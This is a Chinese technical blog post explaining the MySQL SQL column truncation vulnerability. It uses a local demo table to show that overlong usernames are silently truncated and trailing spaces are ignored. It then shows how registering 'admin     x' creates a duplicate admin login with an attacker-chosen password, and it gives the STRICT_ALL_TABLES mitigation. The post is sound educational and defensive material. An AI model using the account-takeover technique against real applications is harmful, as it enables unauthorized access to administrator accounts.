SQL Column Truncation Vulnerabilities

最新推荐文章于 2024-05-04 13:51:18 发布
最新推荐文章于 2024-05-04 13:51:18 发布
阅读量845 收藏
点赞数
分类专栏: web漏洞 文章标签: mysql SQL Column Truncatio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011500307/article/details/24440899
版权

mysql数据插入的时候,如果一列值插入的长度超过了它本身的限制,会自动省略后面的内容。我们先来做下这个试验:

1. 创建一个表:

mysql> create table users (username varchar(10), password varchar(20));
Query OK, 0 rows affected (0.02 sec)

mysql> describe users;
+----------+-------------+------+-----+---------+-------+
| Field    | Type        | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+-------+
| username | varchar(10) | YES  |     | NULL    |       |
| password | varchar(20) | YES  |     | NULL    |       |
+----------+-------------+------+-----+---------+-------+
2 rows in set (0.00 sec)

2. 来插入数据: 

mysql> insert into users values('admin','123456');
Query OK, 1 row affected (0.00 sec)

mysql> select * from users;
+----------+----------+
| username | password |
+----------+----------+
| admin    | 123456   |
+----------+----------+
1 row in set (0.00 sec)

mysql> insert into users values('adminadminadmin','123456');
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from users;
+------------+----------+
| username   | password |
+------------+----------+
| admin      | 123456   |
| adminadmin | 123456   |
+------------+----------+
2 rows in set (0.00 sec)

从上面插入adminadminadmin的时候给出了一个warning,但是还是插入成功了,不过超出的部分被省略了,只剩下adminadmin。

3. mysql还有一个特性,就是数据库中的字符串不会按二进制比较,会自动略掉字符串后面的空格。也就是说在mysql中‘admin    ’等价于'admin'。

mysql> insert into users values('admin   ','qweqwe');
Query OK, 1 row affected (0.00 sec)

mysql> select * from users where username='admin';
+----------+----------+
| username | password |
+----------+----------+
| admin    | 123456   |
| admin    | qweqwe   |
+----------+----------+
2 rows in set (0.00 sec)
可以得到两个admin,空格被忽略了。

4. 现在如果管理员的用户名已知是admin,我们可以利用上面两个特征来重新注册一个admin用户,就可以用自己注册的密码来登录admin了。

mysql> insert into users values('admin     x','asdasd');   #这个‘admin     x’有5个空格,所以x被省略了,直接成了admin了,当你用自己密码就可以登录了
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from users where username='admin';
+------------+----------+
| username   | password |
+------------+----------+
| admin      | 123456   |
| admin      | qweqwe   |
| admin      | asdasd   |
+------------+----------+
3 rows in set (0.00 sec)
5. 造成上面的原因主要是当插入过长的数据时没有检测,只是给了一个警告, 如果设置了sql_mode为STRICT_ALL_TABLES 时,就会检测数据长度,如果太长就直接报错 ,不会插入成功的。 

mysql> select @@sql_mod;
ERROR 1193 (HY000): Unknown system variable 'sql_mod'
mysql> select @@sql_mode;
+------------+
| @@sql_mode |
+------------+
|            |
+------------+
1 row in set (0.00 sec)

mysql> set sql_mode='STRICT_ALL_TABLES';
Query OK, 0 rows affected (0.00 sec)

mysql> insert into users values('admin     x','asdasd');
ERROR 1406 (22001): Data too long for column 'username' at row 1
直接error了,没有插入成功了。



参考:

http://planet.mysql.com/entry/?id=14365

http://www.80sec.com/mysql-charset-truncation-vulnerability.html

http://www.notsosecure.com/blog/2008/09/11/sql-column-truncation-vulnerabilities/



beyondkmp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WordPress 2.6.1 SQL Column Truncation Vulnerability分析
广外女生官方BLOG
09-11 437
  # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)## found by irk4z[at]yahoo.pl# homepage: http://irk4z.wordpress.com/## this is not critical vuln [;## first, read this discovery:# http
MySQL Truncation Vulnerabilities
weixin_30677475的博客
09-13 56
While SQL-Injection is one of the most discussed security problems in web applications other possible problems for SQL queries like overlong input are usually ignored although they can lead to all kin...
SQL注入总结
weixin_40270125的博客
12-11 781
SQL注入第一次为公众所知,是在1998年的著名黑客杂志《Phrack》第54期上,一位叫rfp的黑客发表的一篇题为“NT Web Technology Vulnerabilities”的文章。(http://phrack.org/issues/54/8.html#article) 注入攻击的本质,是把用户输入的数据当做代码执行。注入攻击有两个关键条件: 用户能控制数据的输入。 原本要执行的...
sql注入 mysql root_使用Mysql charset 实现SQL注入
weixin_29202213的博客
02-11 53
Mysql charset Truncation vulnerabilityBy http://www.80sec.com/We found that there is a interesting feature in mysql database,when you are using utf8,gbk or other charsets.This feature may make your ap...
Image compression using modified block truncation coding
05-03
图像编码,this paper presents a modified block truncation coding(BTC) algorithm for image compression.Similar block in an image are mergrd intoa cluster and represented with the cluster center.
block truncation image compression.rar_block truncation_image co
07-13
Image compression using block truncation code
BurpSQLTruncSanner:SQL截断漏洞的凌乱BurpSuite插件
04-24
[WIP] SQLTruncScanner-扫描端点以查找可能SQL截断漏洞。 Burp Extension,用于识别可能SQL截断漏洞。 模糊请求中的每个参数最多添加40个字符的填充版权所有(c)2020 Frans Hendrik Botes(InitRoot)免责声明我对...
multiline-truncation
07-06
多行截断这个库是用 vanilla Javascript 编写的,目的是为包装在具有定义高度的容器内的文本提供多行截断。 容器内允许截断 HTML 内容
truncation:多边形的截断
05-23
截断 多边形的截断 基于布伦特·杰克逊(Brent Jackson)的《使用React构建SVG图标》。
php LFI漏洞的一些收集
u011500307的专栏
06-08 3240
1. LFI全称是local file include,先举个最简单的例子来说明下:
Length Extension Attack
u011500307的专栏
04-19 2854
在做plaidctf时遇到了这个,记录下吧。
burpsuit暴力破解webgoat的用户验证
u011500307的专栏
05-23 1885
1. 在用owaspbwa这个系统的时候,当你要登录
Mysql charset Truncation vulnerability
u011500307的专栏
06-15 718
本文只是重现了下这个漏洞
MySQL 实战 45 讲』20 - 幻读是什么,幻读有什么问题?
最新发布
Gavinjou大笨象的博客
05-04 530
3. 当执行 select * from t where d=5 for update 的时候,6 个记录加上了行锁,还同时加了 7 个间隙锁,这样就确保无法再插入新的记录。
MySQL —— 表的基本操作
学习C++的小陈同学
04-30 395
本篇整理了和表结构相关的各种基本操作(增删查改等等)
MySQL 之 主从复制
我见青山多妩媚,料青山见我应如是
04-28 558
复制是指将主数据库的DDL 和 DML 操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行,从而使得从库和主库的数据保持同步。MySQL支持一台主库同时向多台从库进行复制, 从库同时也可以作为其他从服务器的主库,实现链状复制。
MySQL】1.安装与配置
2301_79719531的博客
04-28 828
文件的安全性问题。文件不利于数据查询和管理。文件不利于存储海量数据。文件在程序中控制不方便。数据库存储介质:磁盘+内存。为了解决上述问题,专家们设计出更加利于管理数据的软件——数据库,他能更加有效的管理数据。数据库可以提供远程服务,即通过远程连接来使用数据库,因此也称为数据库服务器。
MySQL】驱动表、被驱动表详解。—— 性能优化。
我梦
05-01 531
MySQL】驱动表、被驱动表详解。—— 性能优化。
Caused by: java.sql.DataTruncation: Data truncation
10-20
Caused by: java.sql.DataTruncation: Data truncation是Java中的一个异常,通常是由于数据长度超出了数据库字段的限制范围而引起的。这个异常通常会在使用JDBC连接数据库时出现,表示试图将一个过长的数据插入到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值